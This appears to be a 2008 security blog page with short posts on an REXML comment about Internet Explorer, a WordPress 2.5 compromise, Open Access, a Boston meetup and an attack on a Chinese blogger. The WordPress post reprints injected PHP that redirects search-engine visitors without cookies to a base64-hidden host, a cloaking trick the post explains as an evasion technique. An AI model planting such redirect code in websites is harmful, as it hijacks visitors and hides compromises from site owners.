Why you should RTFM: REXML
Sunday, June 22, 2008
Found this great little commentary while researching the write() method in REXML:
ie_hack: Internet Explorer is the worst piece of crap to have ever been written, with the possible exception of Windows itself. Since IE is unable to parse proper XML, we have to provide a hack to generate XML that IE‘s limited abilities can handle. This hack inserts a space before the /> on empty tags. Defaults to false
WordPress 2.5.0 and 2.5.1 vulnerable to attack
Sunday, June 8, 2008
Thanks to co-author Brandon Palmen for the heads up to a WordPress hack in progress. The attackers are using a few obfuscation tricks to inject code into WordPress installations using a recently announced vulnerability. More details in a well written write up here.
The code snippets from a digitalpoint.com forum are shown using base64 encoding to hide the true destination:
<php>
$seref=array("google","msn",
"live","altavista","ask",
"yahoo","aol","cnn",
"weather","alexa");
$ser=0;
foreach($seref as $ref)
if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false)
{ $ser="1"; break; }
if($ser=="1" && sizeof($_COOKIE)==0)
{
header("Location:http://" . base64_decode("YW55cmVzdWx0cy5uZXQ=") . "/");
exit;
}
></php>
This code shows yet another trend we’ve noticed at stopbadware.org of only exploiting those requests which come directly from a search engine. We can only conclude this is to prevent (or delay) detection and maximize infection duration.
Open Access: coming soon
Sunday, June 8, 2008
Peter Suber has written a great post that should be read by anyone interested in education, open source, or what is known as Open Access. In my younger days I listened to the mantra of hacker lore, “Information wants to be free” and so the ideals of Open Access are quite appealing. This mantra seems to have mutated for me and today I personally believe that “Knowledge wants to be free”. Peter points out that, “In the age of print, publishers could control access to research they did not conduct, write up, sponsor or purchase. One reason is that publishers controlled all the effective channels of distribution; but that has changed.”
Beansec June 2008
Sunday, June 8, 2008
Will be held at Middlesex Lounge in Central Square, Cambridge MA on June 18th, 2008. The Enormous Room is all booked up and so we are going to be at our backup location. We are considering making this a permanent move so come check it out.
Chinese hackers political assault on the blogosphere
Wednesday, June 4, 2008
Disturbing news of a hacked blogger in China. This is not a simple DBD setup involving iframes. This was a highly targeted and politically motivated attack. The attackers not only posted a personal picture of her with instructions for viewers to assault her on the street but managed to infiltrate her Skype account.